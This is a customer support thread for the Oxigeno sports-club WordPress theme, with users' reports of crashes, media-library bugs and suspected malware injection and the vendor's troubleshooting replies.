I have Oxigeno and Wordpress 6.4.1 installed. As soon as I want to activate the plugins for Oxigeno, the whole site crashes and I can no longer get into the admin area and the homepage no longer works.

It seems that you are currently running a theme version which is not compatible with the WordPress version.
You need to update your theme to the latest version.

Updating the theme to the latest version should resolve the issues. Once you update the theme, make sure to update the Oxigeno plugin and Bold Page Builder as well.

Working my way through the documentation. It’s a little rough around the edges, especially on the demo content section.
It’s gotten better over time and I’ve made really good progress. I noticed that the website is horribly sluggish on my 300+ Mbps connection so something is definitely not going well. But if I can figure out this speed issue, 5 stars for sure.

I know my support expired, but this is a problem experienced after latest theme update so I would like to ask for your help in this matter: Page Feature Image can no longer be replaced or removed
Our site: https://www.dreamsports.com.hk/about-dsa/ for any page I can no longer replace the Feature Image after last theme update.
I am able to load images to Media Library separately, but when trying to pick an image from Media Library to replace Feature page image, the browser keeps spinning and can not choose an image, but I can click on Upload Image tab and it does upload a new image, it shows as it replaces the Featured Image, but after Update the page, still the old image is being displayed.
I cleared the cache, I disabled all plugins and enabled them one by one, this is still happening.
Please let me know what should I do to be able to replace feature image on any page

We are sorry to hear that you are experiencing issues with the theme.
This is a strange issue as our theme should not affect the default WP functionality such as selecting a featured image.
As the first step, please check if the Oxigeno theme and Oxigeno plugin are the same version – their versions should be kept in sync at all times.

Is this a fresh installation or you have updated a previously installed Oxigeno theme?
The thing is that the theme version 1.3.5 does not have require_once statement on line 76 in file /bold-page-builder/content_elements/bt_bb_counter/bt_bb_counter.php which is reported in the error trace you have pasted.
So it seems that there is some mixup with some older file version and newer file versions in your environment.
We suggest that you delete both Oxigeno theme folder and Oxygeno plugin folder on your web server and freshly install first the theme and after that you will be prompted to install the Oxigeno plugin 1.3.5 as well.

Unfortunately, that is not a valid Oxigeno Copy, the only valid Oxigeno copy can be bought through ThemeForest – https://themeforest.net/item/oxigeno-sport-club-and-team-wordpress-theme/21162565
Furthermore, the cause of the problem is probably the fact that sites like this usually publish modified versions of the theme code with malware in it.
You can contact their support first to try to clarify the problem as this is not a legal copy of the theme and we can not provide support for it.

Is there an easy way to integrate a fullscreen video instead of a static image or a slideshow into one of your home demos?
Hi,
You can set a video as a background of the fullscreen section and, if you wish, place the content on top of it. It needs to be muted though as the browsers do not allow background autoplay videos which are not muted.
Alternatively, you can place the video with play controls as content using text box in fullscreen section.
Any kind of thrird party plugin will serve the purpose as well, you can place shortcode on the page using text element.

That section is part of the site footer.
Oxigeno has a unique way of enabling you to create footer. You can create a static page, and add content to it. Then you can use it as a footer template for all pages.
Please find the Footer page field in the Appearance > Customize > Header & Footer, and edit the referenced page as you would any other.

I spoke with WordPress support about our site being down and they informed me that it was due to the Oxigeno Theme causing a Memory Exhaustion Error. This just happened today about an hour ago, would we need to wait for the Theme to be updated to resolve this?

Among others, our themes use Font Awesome 5 Brands set – https://fortawesome.com/sets/font-awesome-5-brands and unfortunately, it does not feature TikTok icon at the moment. As soon as the update for the set appears we will include it in the package.

One thing is certain – the referenced code does not come either from the original theme code or the packaged plugins’ code.
Your site has probably been hacked into and you need to first figure out what redirects the users or obstructs the normal site output. Is it part of the site code (theme, plugins) or has it been injected into the site content (database).
We can suggest downloading the latest version of the theme from ThemeForest and comparing them to the ones on your web server. Do the same for the packaged plugins.
If they are identical, the problem is most likely within the site content (the malicious code has been inserted into the database).

hello, i have already done that as you mentioned, i complety deleted the Oxigeno folder from theme directory, and copy the recently downloaded one to that folder.
It’s weird, but the code only appears when the Oxigeno theme is activated.

This most likely means that the malicious script might be injected within the content (database).
You can try the following – update Bold Builder plugin to the latest version. Open all static pages and posts within the site in backend editor (wp-admin > pages > edit) one by one and save them again – all BB related data will be sanitized in the publish action, so if the malicious script has been injected in page’s custom css field for example, it will be cleared out.
This might help, but without knowing the exact source of the script we can not be sure.

Please check if your Oxigeno plugin is also updated to version 1.3.0 – the versions of the theme and the plugin should always be the same. If not please update the plugin as well.
If this does not resolve the issue, you need to check your php error log and find out the fatal error message which can tell us the exact cause of the issue.

This is a bug that comes from the WordPress core and is related to bulk updater which is part of WordPress. You can check the details about the issue here: https://github.com/TGMPA/TGM-Plugin-Activation/issues/803#issuecomment-824762177
So, until the WordPress merges the solution into the distribution, it will keep happening.
The solution for the time being is to go to Plugins panel and manually update the plugins (by clicking update link in the plugins list).
